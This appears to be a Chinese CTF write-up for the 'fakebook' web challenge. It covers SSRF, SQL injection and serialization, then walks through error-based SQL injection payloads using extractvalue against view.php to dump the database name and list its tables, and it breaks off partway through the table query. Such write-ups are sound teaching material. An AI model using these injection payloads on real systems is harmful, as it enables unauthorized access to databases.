0x00 知识点
- robots.txt文件泄露
- SSRF(服务器端请求伪造)
- 多种SQL注入以及绕过
- 构造序列化字符串
0x01 知识点详解
- 什么是SSRF?
答:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。
详情推荐去看这个大佬的文章 - 什么是序列化,什么是反序列化?
这里直接放上我之前的文章。
0x02 解题思路
- 打开网站,发现网站题目是fakebook,可以登录注册,其他没有什么功能。
- 尝试注册一个用户,这里注意这个blog必须要以http或者https开头不然没有办法注册。
注册成功后就是这样的。 - 打开用户界面,页面内没有什么有用的信息,但是在url地址栏里发现疑似注入点的地方尝试用(’)测试,观察回显的不同,推测这里是个报错注入。
- 尝试构造payload看看能不能在数据库中得到什么信息
先来查一下数据库
payload:
view.php?no=1 and extractvalue(1,concat('~',(select(group_concat(database())))))%23
这里奇怪的是把0x7e给过滤掉了,~反而没有过滤。
知道了库名后,继续爆表
payload:
view.php?no=1 and extractvalue(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='fakebook')